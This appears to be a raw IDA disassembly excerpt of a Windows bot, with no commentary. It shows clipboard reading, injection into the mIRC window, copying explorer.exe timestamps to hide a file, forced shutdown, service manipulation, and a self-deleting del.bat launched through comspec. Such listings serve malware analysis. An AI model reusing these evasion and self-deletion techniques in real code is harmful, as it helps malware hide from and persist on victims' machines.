push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_40657D: ; CODE XREF: sub_406395+1BA�j
cmp dword_435980, esi
jz short loc_4065B1
push dword_435984
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_4065B1: ; CODE XREF: sub_406395+1EE�j
cmp dword_435988, esi
jz short loc_4065E5
push dword_43598C
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_4065E5: ; CODE XREF: sub_406395+222�j
cmp dword_435990, esi
jz short loc_406619
push dword_435994
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_406619: ; CODE XREF: sub_406395+256�j
cmp dword_435998, esi
jz short loc_40664D
push dword_43599C
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_4145E5
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 20h
loc_40664D: ; CODE XREF: sub_406395+28A�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_4145E5
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40667A
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_40667A: ; CODE XREF: sub_406395+2CE�j
lea eax, [ebp+var_200]
push eax
call sub_401EFF
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_406395 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668C proc near ; CODE XREF: sub_408A18+A5E�p
; sub_408A18+A91�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz loc_406763
mov eax, [ebp+arg_4]
cmp eax, esi
jz loc_406763
cmp [ebp+arg_8], esi
jz loc_406763
cmp byte ptr [eax], 0
jz loc_406763
push ebx
push edi
call sub_41F567
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_40675E
push [ebp+arg_4]
push edi
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_406757
sub eax, edi
push eax
push edi
push ebx
call sub_414670
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [eax+esi], 0
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
loc_4066F9: ; CODE XREF: sub_40668C+72�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4066F9
sub eax, ecx
push eax
push [ebp+arg_8]
push ebx
call sub_4144B0
mov eax, [ebp+arg_4]
add esp, 0Ch
lea ecx, [eax+1]
loc_406715: ; CODE XREF: sub_40668C+8E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406715
sub eax, ecx
add eax, esi
mov esi, eax
loc_406722: ; CODE XREF: sub_40668C+9B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406722
mov edi, ebx
sub eax, esi
dec edi
loc_40672E: ; CODE XREF: sub_40668C+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40672E
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+arg_0]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_40674D: ; CODE XREF: sub_40668C+C9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40674D
loc_406757: ; CODE XREF: sub_40668C+50�j
push ebx
call sub_414A14
pop ecx
loc_40675E: ; CODE XREF: sub_40668C+3B�j
mov eax, esi
pop ebx
jmp short loc_406765
; ---------------------------------------------------------------------------
loc_406763: ; CODE XREF: sub_40668C+C�j
; sub_40668C+17�j ...
xor eax, eax
loc_406765: ; CODE XREF: sub_40668C+D5�j
pop edi
pop esi
pop ebp
retn
sub_40668C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406769 proc near ; CODE XREF: sub_40863D+C2�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ebp+var_7D0]
rep stosd
mov ecx, [ebp+arg_0]
mov eax, ecx
lea esi, [eax+1]
loc_40678C: ; CODE XREF: sub_406769+28�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40678C
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_4067A3
or eax, 0FFFFFFFFh
jmp short loc_406803
; ---------------------------------------------------------------------------
loc_4067A3: ; CODE XREF: sub_406769+33�j
xor edx, edx
test edi, edi
mov [ebp+var_7D0], ecx
jle short loc_4067C3
loc_4067AF: ; CODE XREF: sub_406769+58�j
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_4067BA
cmp al, 0Dh
jnz short loc_4067BE
loc_4067BA: ; CODE XREF: sub_406769+4B�j
and byte ptr [edx+ecx], 0
loc_4067BE: ; CODE XREF: sub_406769+4F�j
inc edx
cmp edx, edi
jl short loc_4067AF
loc_4067C3: ; CODE XREF: sub_406769+44�j
xor esi, esi
test edi, edi
jle short loc_4067ED
loc_4067C9: ; CODE XREF: sub_406769+82�j
cmp byte ptr [esi+ecx], 0
jnz short loc_4067E8
lea edx, [esi+ecx+1]
cmp byte ptr [edx], 0
jz short loc_4067E8
cmp ebx, 1F4h
jge short loc_4067ED
mov [ebp+ebx*4+var_7D0], edx
inc ebx
loc_4067E8: ; CODE XREF: sub_406769+64�j
; sub_406769+6D�j
inc esi
cmp esi, edi
jl short loc_4067C9
loc_4067ED: ; CODE XREF: sub_406769+5E�j
; sub_406769+75�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_406801
mov ecx, 1F4h
lea esi, [ebp+var_7D0]
rep movsd
loc_406801: ; CODE XREF: sub_406769+89�j
mov eax, ebx
loc_406803: ; CODE XREF: sub_406769+38�j
pop edi
pop esi
pop ebx
leave
retn
sub_406769 endp
; =============== S U B R O U T I N E =======================================
sub_406808 proc near ; CODE XREF: sub_406BB6+26�p
; sub_406BF3+79�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_4155DC
cmp al, 61h
pop ecx
jl short loc_406823
cmp al, 7Ah
jg short loc_406823
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_406823: ; CODE XREF: sub_406808+E�j
; sub_406808+12�j
xor eax, eax
retn
sub_406808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406826 proc near ; CODE XREF: sub_408A18+2DCC�p
; sub_408A18+3960�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_420008 ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_4200A8 ; FormatMessageA
lea eax, [ebp+var_100]
loc_40685F: ; CODE XREF: sub_406826+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40686B
cmp cl, 9
jnz short loc_40686E
loc_40686B: ; CODE XREF: sub_406826+3E�j
inc eax
jmp short loc_40685F
; ---------------------------------------------------------------------------
loc_40686E: ; CODE XREF: sub_406826+43�j
; sub_406826+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_406888
mov cl, [eax]
cmp cl, 2Eh
jz short loc_40686E
cmp cl, 21h
jl short loc_40686E
loc_406888: ; CODE XREF: sub_406826+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_4359A8
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41483D
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_406826 endp
; =============== S U B R O U T I N E =======================================
sub_4068B0 proc near ; CODE XREF: sub_408A18+464B�p
push esi
push 0
call dword_435794 ; OpenClipboard
test eax, eax
jz short loc_4068E7
push 1
call dword_435914 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_4068E7
push edi
push esi
call ds:dword_4200B0 ; GlobalLock
push esi
mov edi, eax
call ds:dword_4200AC ; GlobalUnlock
call dword_435778 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4068E7: ; CODE XREF: sub_4068B0+B�j
; sub_4068B0+19�j
xor eax, eax
pop esi
retn
sub_4068B0 endp
; =============== S U B R O U T I N E =======================================
sub_4068EB proc near ; CODE XREF: sub_408A18+38C0�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_435840 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_406967
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_4200BC ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call ds:dword_4200B8 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_4145E5
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4358A8 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4358A8 ; SendMessageA
push ebx
call ds:dword_4200B4 ; UnmapViewOfFile
push edi
call ds:dword_42003C ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_406969
; ---------------------------------------------------------------------------
loc_406967: ; CODE XREF: sub_4068EB+16�j
xor eax, eax
loc_406969: ; CODE XREF: sub_4068EB+7A�j
pop edi
pop esi
pop ebp
retn
sub_4068EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40696D proc near ; CODE XREF: sub_40E745+21E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_435808 ; SearchPathA
test eax, eax
jz short loc_406A0E
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, ds:dword_420044
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_406A0C
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4200C4 ; GetFileTime
push ebx
mov ebx, ds:dword_42003C
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_406A0C
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4200C0 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_406A0C: ; CODE XREF: sub_40696D+51�j
; sub_40696D+87�j
pop edi
pop ebx
loc_406A0E: ; CODE XREF: sub_40696D+28�j
pop esi
leave
retn
sub_40696D endp
; =============== S U B R O U T I N E =======================================
sub_406A11 proc near ; CODE XREF: sub_408A18+11B6�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_40819B
pop ecx
pop ecx
push 50005h
push 6
call dword_435880 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_406A11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A33 proc near ; CODE XREF: sub_40260A+495�p
; sub_408A18+48FE�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push ebx
xor ebx, ebx
cmp dword_42BECC, ebx
push esi
jz short loc_406A57
cmp dword_435948, ebx
jnz short loc_406A57
push ebx
call sub_40213F
pop ecx
loc_406A57: ; CODE XREF: sub_406A33+13�j
; sub_406A33+1B�j
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_4200D0 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_4145E5
add esp, 0Ch
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_260]
push eax
call ds:dword_420044 ; CreateFileA
mov esi, eax
cmp esi, ebx
jbe loc_406BB2
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_4145E5
lea eax, [ebp+var_764]
add esp, 0Ch
lea edx, [eax+1]
loc_406ACA: ; CODE XREF: sub_406A33+9C�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_406ACA
push edi
push ebx
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
lea eax, [ebp+var_764]
push eax
push esi
call ds:dword_420040 ; WriteFile
push esi
call ds:dword_42003C ; CloseHandle
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push 11h
stosd
pop ecx
xor eax, eax
lea edi, [ebp+var_58]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_15C]
push eax
push ebx
mov [ebp+var_4C], 420AEAh
mov [ebp+var_58], 44h
mov [ebp+var_2C], 1
mov [ebp+var_28], bx
call ds:dword_4200A4 ; GetModuleHandleA
push eax
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_4200A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
pop edi
jz short loc_406B5B
push 80h
lea eax, [ebp+var_15C]
push eax
call ds:dword_4200CC ; SetFileAttributesA
loc_406B5B: ; CODE XREF: sub_406A33+114�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_4145E5
add esp, 10h
push esi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_4200C8 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push ebx
push ebx
push 4010h
push ebx
push ebx
push ebx
lea eax, [ebp+var_364]
push eax
push ebx
call ds:dword_420038 ; CreateProcessA
loc_406BB2: ; CODE XREF: sub_406A33+6D�j
pop esi
pop ebx
leave
retn
sub_406A33 endp
; =============== S U B R O U T I N E =======================================
sub_406BB6 proc near ; CODE XREF: sub_406BF3+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_406BF0
push ebx
mov ebx, edi
loc_406BD3: ; CODE XREF: sub_406BB6+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_406808
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_406BD3
pop ebx
loc_406BF0: ; CODE XREF: sub_406BB6+18�j
pop edi
pop esi
retn
sub_406BB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406BF3 proc near ; CODE XREF: sub_401FDF+10�p
; sub_402011+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_414800
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_406C06: ; CODE XREF: sub_406BF3+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406C06
sub eax, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_406C18: ; CODE XREF: sub_406BF3+2A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406C18
push ebx
push esi
sub eax, ecx
mov esi, eax
push edi
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_406BB6
add esp, 0Ch
dec esi
mov edi, esi
jmp short loc_406CB5
; ---------------------------------------------------------------------------
loc_406C41: ; CODE XREF: sub_406BF3+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4155DC
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_4155DC
cmp eax, ebx
pop ecx
pop ecx
jz short loc_406CB3
loc_406C63: ; CODE XREF: sub_406BF3+BE�j
mov ebx, [ebp+arg_0]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_406808
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_406C86
mov eax, ecx
loc_406C86: ; CODE XREF: sub_406BF3+8F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_406CC3
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4155DC
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_4155DC
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_406C63
loc_406CB3: ; CODE XREF: sub_406BF3+6E�j
dec edi
dec esi
loc_406CB5: ; CODE XREF: sub_406BF3+4C�j
test esi, esi
jg short loc_406C41
mov eax, [ebp+arg_0]
add eax, edi
loc_406CBE: ; CODE XREF: sub_406BF3+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406CC3: ; CODE XREF: sub_406BF3+98�j
xor eax, eax
jmp short loc_406CBE
sub_406BF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CC7 proc near ; CODE XREF: sub_4077A8+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_4358A4 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_406CEE
call ds:dword_420008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_406D63
; ---------------------------------------------------------------------------
loc_406CEE: ; CODE XREF: sub_406CC7+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_435920 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_406D0E
call ds:dword_420008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_406D5B
; ---------------------------------------------------------------------------
loc_406D0E: ; CODE XREF: sub_406CC7+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_406D41
cmp eax, 3
jz short loc_406D32
jle short loc_406D54
cmp eax, 6
jg short loc_406D54
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4358C8 ; ControlService
jmp short loc_406D48
; ---------------------------------------------------------------------------
loc_406D32: ; CODE XREF: sub_406CC7+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4358AC ; StartServiceA
jmp short loc_406D48
; ---------------------------------------------------------------------------
loc_406D41: ; CODE XREF: sub_406CC7+4D�j
push esi
call dword_4357DC ; DeleteService
loc_406D48: ; CODE XREF: sub_406CC7+69�j
; sub_406CC7+78�j
test eax, eax
jnz short loc_406D54
call ds:dword_420008 ; RtlGetLastWin32Error
mov ebx, eax
loc_406D54: ; CODE XREF: sub_406CC7+54�j
; sub_406CC7+59�j ...
push esi
call dword_435818 ; CloseServiceHandle
loc_406D5B: ; CODE XREF: sub_406CC7+45�j
push edi
call dword_435818 ; CloseServiceHandle
pop esi
loc_406D63: ; CODE XREF: sub_406CC7+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_406CC7 endp
; =============== S U B R O U T I N E =======================================
sub_406D69 proc near ; CODE XREF: sub_4077A8:loc_4077F0�p
mov ecx, 420h
cmp eax, ecx
ja loc_406E1A
jz loc_406E13
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_406DDD
jz short loc_406DD3
mov ecx, eax
sub ecx, 3
jz short loc_406DC9
dec ecx
dec ecx
jz short loc_406DBF
dec ecx
jz short loc_406DB5
sub ecx, 51h
jz short loc_406DAB
sub ecx, 24h
jnz loc_406E90 ; default
; jumptable 00406E37 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_406E82
; ---------------------------------------------------------------------------
loc_406DAB: ; CODE XREF: sub_406D69+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_406E82
; ---------------------------------------------------------------------------
loc_406DB5: ; CODE XREF: sub_406D69+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_406E82
; ---------------------------------------------------------------------------
loc_406DBF: ; CODE XREF: sub_406D69+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_406E82
; ---------------------------------------------------------------------------
loc_406DC9: ; CODE XREF: sub_406D69+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_406E82
; ---------------------------------------------------------------------------
loc_406DD3: ; CODE XREF: sub_406D69+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_406E82
; ---------------------------------------------------------------------------
loc_406DDD: ; CODE XREF: sub_406D69+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_406E0C
dec ecx
jz short loc_406E05
dec ecx
jz short loc_406DFE
dec ecx
jnz loc_406E90 ; default
; jumptable 00406E37 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_406E82
; ---------------------------------------------------------------------------
loc_406DFE: ; CODE XREF: sub_406D69+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E05: ; CODE XREF: sub_406D69+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E0C: ; CODE XREF: sub_406D69+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E13: ; CODE XREF: sub_406D69+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E1A: ; CODE XREF: sub_406D69+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_406E90 ; default
; jumptable 00406E37 cases 1,5,6,8,9,12,13,15,16
jz short loc_406E7D
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_406E90 ; default
; jumptable 00406E37 cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_406ED1[ecx]
jmp ds:off_406EA9[ecx*4] ; switch jump
loc_406E3E: ; DATA XREF: .text:off_406EA9�o
push offset aTheSpecifiedDa ; jumptable 00406E37 case 7
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E45: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheServiceDepe ; jumptable 00406E37 case 17
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E4C: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheServiceDe_0 ; jumptable 00406E37 case 10
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E53: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheServiceHasB ; jumptable 00406E37 case 0
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E5A: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheSpecified_0 ; jumptable 00406E37 case 2
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E61: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheServiceCoul ; jumptable 00406E37 case 11
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E68: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheServiceHa_0 ; jumptable 00406E37 case 14
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E6F: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheRequested_1 ; jumptable 00406E37 case 3
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E76: ; CODE XREF: sub_406D69+CE�j
; DATA XREF: .text:off_406EA9�o
push offset aTheServiceHasN ; jumptable 00406E37 case 4
jmp short loc_406E82
; ---------------------------------------------------------------------------
loc_406E7D: ; CODE XREF: sub_406D69+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_406E82: ; CODE XREF: sub_406D69+3D�j
; sub_406D69+47�j ...
push offset dword_435BA8
call sub_4145E5
pop ecx
pop ecx
jmp short loc_406EA3
; ---------------------------------------------------------------------------
loc_406E90: ; CODE XREF: sub_406D69+32�j
; sub_406D69+85�j ...
push eax ; default
; jumptable 00406E37 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_435BA8
call sub_4145E5
add esp, 0Ch
loc_406EA3: ; CODE XREF: sub_406D69+125�j
mov eax, offset dword_435BA8
retn
sub_406D69 endp
; ---------------------------------------------------------------------------
off_406EA9 dd offset loc_406E53 ; DATA XREF: sub_406D69+CE�r
dd offset loc_406E5A ; jump table for switch statement
dd offset loc_406E6F
dd offset loc_406E76
dd offset loc_406E3E
dd offset loc_406E4C
dd offset loc_406E61
dd offset loc_406E68
dd offset loc_406E45
dd offset loc_406E90
byte_406ED1 db 0, 9, 1, 2 ; DATA XREF: sub_406D69+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EE3 proc near ; CODE XREF: sub_408A18+1C52�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4358A4 ; OpenSCManagerA
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
loc_406F1B: ; CODE XREF: sub_406EE3+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_4358B4 ; EnumServicesStatusA
test eax, eax
jnz short loc_406F55
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_40700C
loc_406F55: ; CODE XREF: sub_406EE3+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_407003
lea esi, [ebp+var_188]
loc_406F66: ; CODE XREF: sub_406EE3+11A�j
mov eax, [esi+8]
dec eax
jz short loc_406FB2
dec eax
jz short loc_406FAB
dec eax
jz short loc_406FA4
dec eax
jz short loc_406F9D
dec eax
jz short loc_406F96
dec eax
jz short loc_406F8F
dec eax
lea eax, [ebp+var_20]
jz short loc_406F88
push offset aUnknown_0 ; " Unknown"
jmp short loc_406FBA
; ---------------------------------------------------------------------------
loc_406F88: ; CODE XREF: sub_406EE3+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_406FBA
; ---------------------------------------------------------------------------
loc_406F8F: ; CODE XREF: sub_406EE3+96�j
push offset aPausing ; " Pausing"
jmp short loc_406FB7
; ---------------------------------------------------------------------------
loc_406F96: ; CODE XREF: sub_406EE3+93�j
push offset aContinuing ; " Continuing"
jmp short loc_406FB7
; ---------------------------------------------------------------------------
loc_406F9D: ; CODE XREF: sub_406EE3+90�j
push offset aRunning ; " Running"
